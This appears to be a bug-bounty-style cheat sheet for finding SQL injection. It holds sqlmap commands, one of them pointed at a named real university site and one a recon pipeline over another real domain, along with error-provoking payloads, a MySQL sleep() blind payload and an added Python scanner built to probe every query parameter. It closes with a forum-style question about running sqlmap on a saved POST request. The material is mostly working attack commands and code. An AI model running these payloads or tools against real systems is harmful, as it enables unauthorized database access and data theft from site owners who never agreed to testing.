👑Find SQL Injection (CWE-89)
SQLMAP Command
sqlmap -u "https://fics.nust.edu.pk/event/igs.php?id=6" --technique=BT --level=5 --risk=3 --threads=10 --dbms='MySQL' --batch --current-db --random-agent

(--technique=BT restricts sqlmap to boolean-based and time-based blind checks; drop it to let sqlmap try error-based and UNION techniques as well.)

Error check over an existing endpoint list:
cat old_endpoints.txt | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*"

Same check over URLs harvested with gau:
echo "https://www.tgophoto.com" | gau | uro | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*"

Caveats: sed "s/=.*/=A'/" rewrites everything from the first = to the end of the line, so only the first parameter gets the probe and any later parameters are dropped; uniq only collapses adjacent duplicates, so sort the list first if it is not already ordered (uro already dedupes). The -mr pattern is deliberately broad (error, Server and Microsoft match plenty of pages with no SQL error in them), so treat a hit as a lead to confirm by hand or with sqlmap, not as a finding.

Check Error
?id=2' ----> Create Error
?id=2'' ----> Create Error
?id=2%5c ----> Create Error
?id=2''' ----> Create Error
?id=2'''' ----> Create Error
?id=2" ----> Create Error
?id=2"" ----> Create Error
?id=2'\ ----> Create Error
?id=2"\ ----> Create Error
?id=2'/ ----> Create Error
?id=2"/ ----> Create Error
?id=2%bf%5c' ----> Create Error
?id=2%bf%5c" ----> Create Error

Check Blind
?id=(select*from(select(sleep(20)))a)
----------------------------------------------------------------
python3 sqlmap.py -u --dbs --risk=3 --level=5 --random-agent --batch
----------------------------------------------------------------
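Added example (my own, not code from these notes): a small Python script that does offline what the one-liners above do against a live target. It appends each suffix from the Check Error list to every query parameter (not only the first one, which is all the sed rewrite reaches), looks for the httpx-toolkit error tokens in the response, and applies the sleep(20) timing test from Check Blind. The target https://example.com/event.php?id=6&lang=en, the canned responses and fake_fetch are constructed so the script runs offline; swap in http_fetch to point it at something real.

```python
import re
import time
import urllib.error
import urllib.request
from typing import Callable, List, Optional, Tuple
from urllib.parse import urlsplit, urlunsplit

# Error-provoking suffixes from the Check Error list, appended to a value of "A".
ERROR_PROBES = [
    "'", "''", "%5c", "'''", "''''", '"', '""',
    "'\\", '"\\', "'/", '"/', "%bf%5c'", '%bf%5c"',
]

# MySQL time-based payload from Check Blind; DELAY must match the sleep() argument.
DELAY = 20
BLIND_PROBE = "(select*from(select(sleep(%d)))a)" % DELAY

# Same alternatives as the httpx-toolkit -mr expression (the surrounding .* are
# redundant for a search). "error", "Server" and "Microsoft" are very noisy.
ERROR_PATTERN = re.compile(
    r"SQL|syntax|error|Server|Application|Error|'/'|ORA-00933|Microsoft|PSQLException"
)

Response = Tuple[int, str, float]  # (status, body, elapsed seconds)


def build_probes(url: str, value: str) -> List[str]:
    """One URL per query parameter, with that parameter's value replaced by
    `value` verbatim (no re-encoding, so %bf%5c survives). This generalises the
    sed "s/=.*/=A'/" trick, which only ever rewrites the first parameter."""
    parts = urlsplit(url)
    if not parts.query:
        return []
    pairs = parts.query.split("&")
    probes = []
    for i, pair in enumerate(pairs):
        key = pair.split("=", 1)[0]
        mutated = pairs[:i] + ["%s=%s" % (key, value)] + pairs[i + 1:]
        probes.append(urlunsplit(parts._replace(query="&".join(mutated))))
    return probes


def find_error(body: str) -> Optional[str]:
    """Leftmost DBMS-error token in a response body, or None."""
    m = ERROR_PATTERN.search(body)
    return m.group(0) if m else None


def is_delayed(baseline_s: float, probe_s: float, delay: int = DELAY) -> bool:
    """True when the probe ran at least `delay` seconds longer than the
    baseline, with 10% slack for jitter. Repeat before trusting a hit."""
    return probe_s - baseline_s >= 0.9 * delay


def scan(urls: List[str], fetch: Callable[[str], Response]) -> List[Tuple[str, str, str]]:
    """Run the error and timing probes over `urls`; returns (probe_url, kind,
    evidence). A token is only reported if it differs from whatever the
    unmodified page already matched, which filters most "Server"-style noise."""
    findings = []
    for url in urls:
        _, base_body, base_t = fetch(url)
        base_token = find_error(base_body)
        for suffix in ERROR_PROBES:
            for probe in build_probes(url, "A" + suffix):
                _, body, _ = fetch(probe)
                token = find_error(body)
                if token and token != base_token:
                    findings.append((probe, "error", token))
        for probe in build_probes(url, BLIND_PROBE):
            _, _, t = fetch(probe)
            if is_delayed(base_t, t):
                findings.append((probe, "time", "+%.1fs" % (t - base_t)))
    return findings


def http_fetch(url: str, timeout: float = DELAY + 10) -> Response:
    """Live fetcher (not used in the offline demo). A 4xx/5xx body is kept
    because that is where the DBMS error text usually lives."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    t0 = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return r.status, r.read().decode("utf-8", "replace"), time.monotonic() - t0
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace"), time.monotonic() - t0


# Constructed stand-in for a live target (not real traffic): the single-quote
# probe on id returns the standard MySQL syntax error, the sleep() probe on id
# takes about 20 s, everything else answers a normal page in 0.2 s.
TARGET = "https://example.com/event.php?id=6&lang=en"
CANNED = {
    "id=A'&lang=en": (500, "You have an error in your SQL syntax; check the manual", 0.2),
    "id=%s&lang=en" % BLIND_PROBE: (200, "<html>event 6</html>", 20.4),
}


def fake_fetch(url: str) -> Response:
    return CANNED.get(urlsplit(url).query, (200, "<html>event 6</html>", 0.2))


if __name__ == "__main__":
    for probe, kind, evidence in scan([TARGET], fake_fetch):
        print(kind, evidence, probe)
```

Against the constructed target this reports one error hit (id=A') and one timing hit (the sleep payload on id); the lang parameter stays quiet. A timing hit on a real target should be re-run, ideally with a second delay value, before it goes in a report, because a slow backend or a rate limiter produces the same symptom.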
sqli or not? So it was POST /xxx.php HTTP 1.1 with multipart params > .php
should I try sqli? > replaced one param with * > saved as r.txt
cmd:
python3 sqlmap.py -r r.txt --level 5 --risk 3 --dbs --time-sec=15 --hostname